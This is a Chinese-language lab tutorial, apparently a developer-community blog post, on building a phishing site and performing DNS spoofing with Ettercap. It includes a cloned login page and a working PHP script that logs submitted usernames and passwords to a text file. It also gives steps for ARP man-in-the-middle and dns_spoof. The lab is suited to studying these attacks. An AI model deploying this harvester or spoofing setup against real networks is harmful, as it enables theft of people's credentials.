搭建网站实现DNS欺骗
前言
随着信息技术的飞速发展,网络搭建和服务器搭建已成为现代社会的基石。它们如同数字世界的骨架,支撑着各类应用的运行,让信息的传递和共享变得前所未有的便捷。然而,这仅仅是开始,对于真正渴望在信息技术领域探索的人们来说,学习的道路上仍有无数高峰等待我们去攀登。
此刻,我们正站在一个崭新的起点,带着对知识和技术的渴望,开启一段全新的学习篇章。在这个篇章中,我们将不满足于仅仅搭建起稳固的网络和服务器,更将深入网络攻击.
学习新篇章的道路或许充满挑战,但正是这些挑战,将激发我们不断前行的动力。我们将不断实践,通过实际操作来巩固理论知识,通过解决问题来提升技能水平。我们将不断分享,将学习过程中的心得体会与同行交流,共同成长。
本前言旨在为广大学习者提供一个清晰的学习方向和目标,激发大家的学习热情,让我们一同迎接新篇章的挑战,成就更美好的未来。
一、什么是DNS欺骗和钓鱼网站?
DNS欺骗:
定义: DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。 原理:如果可以冒充域名服务器,然后把查询的IP地址设为攻击者的IP地址,这样的话,用户上网就只能看到攻击者的主页,而不是用户想要取得的网站的主页了,这就是DNS欺骗的基本原理。DNS欺骗其实并不是真的“黑掉”了对方的网站,而是冒名顶替、招摇撞骗罢了。
钓鱼网站:
钓鱼网站是指欺骗用户的虚假网站。“钓鱼网站”的页面与真实网站界面基本一致,欺骗消费者或者窃取访问者提交的账号和密码信息。钓鱼网站一般只有一个或几个页面,和真实网站差别细微 [1]。钓鱼网站是互联网中最常碰到的一种诈骗方式,通常伪装成银行及电子商务、窃取用户提交的银行账号、密码等私密信息的网站。
二、正文
1)实验目的
学习钓鱼网站如何搭建,DNS欺骗如何实现。
如何通过DNS欺骗来获取对方密码
2)实验背景
你是一名cracker,这次你不再是正义使者,而是一个正常的黑客,需要你做的就是通过搭建一个与正规的网站一模一样的网站对访问者进行欺骗,从而轻松获取到对方的账户和密码
3)实验设备
windows Server 2003 1台;客户机 windows 7 ;kali;(Windows Server 2003安装,Windows 7安装)
4)实验配置
1.实验设备均在VMnet 2中
2.实验设备IP
操作系统 | IP地址 | DNS地址 |
|---|---|---|
kali | 10.1.1.2/24 | 10.1.1.2 |
wndows 7 | 10.1.1.3/24 | 10.1.1.1 |
windows server 2003 | 10.1.1.1/24 | 10.1.1.1 |
3.测试连通性
4.准备实验所需文件
1)
Windows 2003 中的文件
(1)index.html
(2)abc.html
index.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>XXX网站登录</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f2f2f2;
padding: 20px;
}
.container {
max-width: 400px;
background-color: #ffffff;
padding: 30px;
border-radius: 10px;
box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
margin: 0 auto;
}
h2 {
text-align: center;
margin-bottom: 30px;
}
.form-group {
margin-bottom: 20px;
}
.form-group label {
display: block;
font-weight: bold;
margin-bottom: 5px;
}
.form-group input {
width: 100%;
padding: 10px;
border-radius: 5px;
border: 1px solid #ccc;
}
.form-group button {
width: 100%;
padding: 10px;
background-color: #4CAF50;
color: #ffffff;
border: none;
border-radius: 5px;
cursor: pointer;
}
.form-group button:hover {
background-color: #bb4288;
}
.form-group a {
display: block;
text-align: center;
font-size: 14px;
color: #4CAF50;
margin-top: 10px;
}
</style>
</head>
<body>
<div class="container">
<h2>XXX网站登录</h2>
<form href="/ab.html method="post">
<div class="form-group">
<label for="username">用户名:</label>
<input type="text" id="username" name="username" required>
</div>
<div class="form-group">
<label for="password">密码:</label>
<input type="password" id="password" name="password" required>
</div>
<div class="form-group">
<button type="submit">登录</button>
</div>
<div class="form-group">
<a href="/abc.html">还没有账号?立即注册</a>
</div>
</form>
</div>
</body>
</html>abc.html
<!DOCTYPE html>
<html>
<head>
<title>注册页面</title>
</head>
<body>
<h1>欢迎来到注册页面</h1>
<form action="register.php" method="post">
<label for="name">姓名:</label>
<input type="text" id="name" name="name" required><br><br>
<label for="email">邮箱地址:</label>
<input type="email" id="email" name="email" required><br><br>
<label for="password">密码:</label>
<input type="password" id="password" name="password" required><br><br>
<label for="confirm_password">确认密码:</label>
<input type="password" id="confirm_password" name="confirm_password" required><br><br>
<label for="phone">手机号码:</label>
<input type="text" id="phone" name="phone" required><br><br>
<label for="gender">性别:</label>
<input type="radio" id="male" name="gender" value="male">男
<input type="radio" id="female" name="gender" value="female">女
<input type="radio" id="other" name="gender" value="other">其他<br><br>
<label for="dob">出生日期:</label>
<input type="date" id="dob" name="dob" required><br><br>
<input type="submit" value="注册">
</form>
</body>
</html>2)
kali中需要放置的文件
(1)钓鱼网站代码,核心文件 login.php,接受密码文本 1.txt
(2)三个文件放在一个目录下
钓鱼网站代码
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>XXX网站登录</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f2f2f2;
padding: 20px;
}
.container {
max-width: 400px;
background-color: #ffffff;
padding: 30px;
border-radius: 10px;
box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
margin: 0 auto;
}
h2 {
text-align: center;
margin-bottom: 30px;
}
.form-group {
margin-bottom: 20px;
}
.form-group label {
display: block;
font-weight: bold;
margin-bottom: 5px;
}
.form-group input {
width: 100%;
padding: 10px;
border-radius: 5px;
border: 1px solid #ccc;
}
.form-group button {
width: 100%;
padding: 10px;
background-color: #4CAF50;
color: #ffffff;
border: none;
border-radius: 5px;
cursor: pointer;
}
.form-group button:hover {
background-color: #bb4288;
}
.form-group a {
display: block;
text-align: center;
font-size: 14px;
color: #4CAF50;
margin-top: 10px;
}
</style>
</head>
<body>
<div class="container">
<h2>XXX网站登录</h2>
<form action="login.php" method="post">
<div class="form-group">
<label for="username">用户名:</label>
<input type="text" id="username" name="username" required>
</div>
<div class="form-group">
<label for="password">密码:</label>
<input type="password" id="password" name="password" required>
</div>
<div class="form-group">
<button type="submit">登录</button>
</div>
<div class="form-group">
<a href="/register">还没有账号?立即注册</a>
</div>
</form>
</div>
</body>
</html>核心文件 login.php (一定要照这个名字起)
<?php
$nam=stripslashes($_POST['username']);
$pas=stripslashes($_POST['password']);
$content="捕获到账号密码:"."用户名".$nam."密码".$pas;
$filed=@fopen("1.txt","a+");
@fwrite($filed,"$content\n");
?>
<html>
<head>
<script type="text/javascript">
function goBack()
{
window.history.back()
}
</script>
</head>
<body onload="goBack()">
</body>
</html>接受账户密码文本 1.txt (直接创建就好)
5.模拟正规网站在服务器上搭建DNS服务器和Web服务器
(Windows Serve 2003 Web服务器搭建,Windows Server 2003 DNS服务器搭建)
6.使用Kali进行DNS修改
输入命令(在root权限下)
修改DNS正向解析和反向解析到的IP指向我们的Kali服务器,保存退出
7.搭建Kali的Web服务器
搭建服务器
找到路径/var/www/html下,将目录下的其他内容删除
将我们上面写好的文件统一上传到对应的文件夹下
给login.php足够的权限,后面需要写入写出内容
进行扫描(软件如何使用博客已经写过,不懂可以去看一下Ettercap)
将10.1.1.1作为第一对象,10.1.1.3作为第二对象
双击dns_spoof后前面会出现星号(*),代表DNS欺骗开启,再开启ARP欺骗来做中间人
8.实验验证
这是未欺骗前的访问www.xxx.com网站,输入密码后点击登录,得到的是无法找到该页
我们需要刷新DNS解析表 WIN+R输入命令:ipconfig /flushdns
当我们再次访问www.xxx.com网页的时候,输入账号密码后点击登录,发现客户端看到是只是刷新,而不是进行下一步
这个是时候我们来到Kali上,查看1.txt文件
我们多试几次
再来到kali上看一看1.txt文件
腾讯云开发者
